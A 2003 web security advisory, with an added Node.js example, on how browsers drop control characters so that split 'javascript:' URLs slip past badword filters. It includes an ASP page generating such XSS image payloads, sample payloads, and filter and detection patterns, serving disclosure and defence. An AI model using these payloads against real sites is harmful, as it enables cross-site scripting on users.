
Passing script/html-filter with special chars (multibrowser)



ben moeckel security research - http://badWebMasters.net - security
advisories
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


badWebMasters security advisory #012:

	Passing script/html-filter with special chars (multibrowser)


Discovery date: 2003-07-16

Author: 

	ben moeckel (http://distressed.de)
	mailto: badwebmasters@online.de


Description:

	When web browsers parse HTML they silently drop certain special
	(control) characters; a malicious user can rely on this behaviour
	to fool script/HTML filters in web applications.


Detail:

	badWebMasters showed in their advisory #011 how to pass
	the "Snitz Forums" script filter with the Tab char (09).
	After "Opera" and "Mozilla" users noticed that the
	provided exploit didn't work on their systems, I decided
	to start some new tests, with an amazing result!

	To detect which special chars can be used in HTML
	parameters I set up the following ASP page:

	-------------------------------------------2.asp---------
	<%@LANGUAGE=JScript%><%
	// Helper "a()" is used instead of a bare alert() because Mozilla
	// blocks window.alert() inside "javascript:" image URLs (see below).
	%><script>function a(o){alert(o)}</script><%
	// Control image: an unbroken "javascript:" URL that should fire in
	// every browser.
	%><img src="javascript:a('test')" /><%

	// For every byte 0..255 emit an <img> whose "javascript:" scheme is
	// split by that byte; the alert's argument reports which byte the
	// browser silently dropped.
	var i, uc;
	for(i=0;i<256;++i){
		uc = "%"+chk(i.toString(16));
		%><img src="ja<%=unescape(uc)%>vascript:a(<%=i%>)" />
	<% }

	// Left-pad a one-digit hex value to two digits so unescape()
	// receives a valid "%XX" escape.
	function chk(sInp){if(sInp.length<2){
		return String("0"+sInp)
	}else{return sInp}}
	%>
	---------------------------------------------------------

	The page was viewed with Mozilla, Opera and Internet
	Explorer; the alert box popped up in this order:

		Mozilla 1.3.1 (Win32): 	0 (with restrictions)

		Opera 7.11 (Win32): 	0, 9, 10, 13, 173

		Internet Explorer 5.0:	13, 10, 9, 0

	Mozilla doesn't allow the window.alert() method in "javascript:"
	images, so I had to use my own function "a()". It also returned
	an error for chars 9, 10 and 13: "Error: unterminated regular
	expression literal".

	Webmasters should be careful with char 173 (ADh), which can be
	used in Opera only.

	And last but not least, silly Internet Explorer: reversed order!?


Test:

	http://badwebmasters.net/advisory/012/test.asp


Workaround:

	This advisory addresses all web apps that use a badword filter:
	make sure all control chars are removed before the badwords are
	removed!
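The ordering rule in the workaround, shown as an added example (Node.js, written for this page, not the advisory's own ASP test page). It puts a naive badword filter beside one that normalizes first, and judges both against a rough model of the browser behaviour the advisory measured. The five dropped byte values come from the advisory; the wider strip range (all C0 controls, DEL and U+00AD), the scheme allowlist and the sample markup are assumptions made here.

```javascript
// Bytes the advisory's measurements show browsers dropping inside a URL
// scheme: 0, 9, 10, 13 in all three browsers, plus 173 (ADh, the soft
// hyphen) in Opera 7.11. Used only to model the browser for the check below.
const BROWSER_DROPPED = /[\u0000\u0009\u000A\u000D\u00AD]/g;

// What the hardened filter strips before matching. Assumption that goes
// beyond the five measured bytes: the whole C0 control range, DEL and
// U+00AD, since any of them may be dropped by some parser.
const STRIP_RE = /[\u0000-\u001F\u007F\u00AD]/g;

// Weak filter: removes the badword from the raw input. A scheme split by a
// control char ("ja\tvascript:") is not matched, yet the browser later drops
// the TAB and executes the URL.
function naiveFilter(html) {
  return html.replace(/javascript:/gi, "");
}

// Hardened filter, following the advisory's workaround: remove the control
// chars first, then apply the badword filter to the normalized text.
function hardenedFilter(html) {
  return html.replace(STRIP_RE, "").replace(/javascript:/gi, "");
}

// Rough model of the observed browser behaviour: drop the separator bytes,
// then see whether a "javascript:" scheme remains.
function browserWouldExecute(html) {
  return /javascript:/i.test(html.replace(BROWSER_DROPPED, ""));
}

// Safer alternative to badword blacklisting: normalize, then allowlist the
// URL scheme. The allowlist is an assumed example; adjust it per application.
function allowedScheme(url) {
  const norm = url.replace(STRIP_RE, "").toLowerCase();
  const m = norm.match(/^\s*([a-z][a-z0-9+.\-]*):/);
  if (!m) return true;            // no scheme at all: a relative URL
  return ["http", "https", "mailto"].includes(m[1]);
}

// Constructed samples modelled on the advisory's test page (not captured
// data): the unbroken scheme plus each of the five separator bytes it found.
const SAMPLES = [
  '<img src="javascript:a(\'test\')" />',
  ...[0, 9, 10, 13, 173].map(
    (code) => `<img src="ja${String.fromCharCode(code)}vascript:a(${code})" />`),
];

// Per sample: would the browser still run script after this filter?
function survivors(filter) {
  return SAMPLES.map((s) => browserWouldExecute(filter(s)));
}

console.log("naive:   ", survivors(naiveFilter));    // only the control sample is caught
console.log("hardened:", survivors(hardenedFilter)); // all caught
```

Stripping control characters before matching closes the gap the advisory describes, but a substring blacklist still has its own weaknesses (a single removal pass can leave a nested match behind), so the allowlist check on the normalized scheme is the more robust option where the application can enforce it.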


References: 

	badWebMasters advisory #011: Cross-Site-Scripting @ Snitz Forums
	- http://cert.uni-stuttgart.de/archive/bugtraq/2003/04/msg00247.html


Feedback: 

	Comments, suggestions, updates, anything else?
		-> mailto:badwebmasters@online.de


Source:

	http://badwebmasters.net/advisory/012/ (text/html)


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Copyright 2003 by ben moeckel (Benjamin Klimmek) for badWebMasters.
http://badwebmasters.net
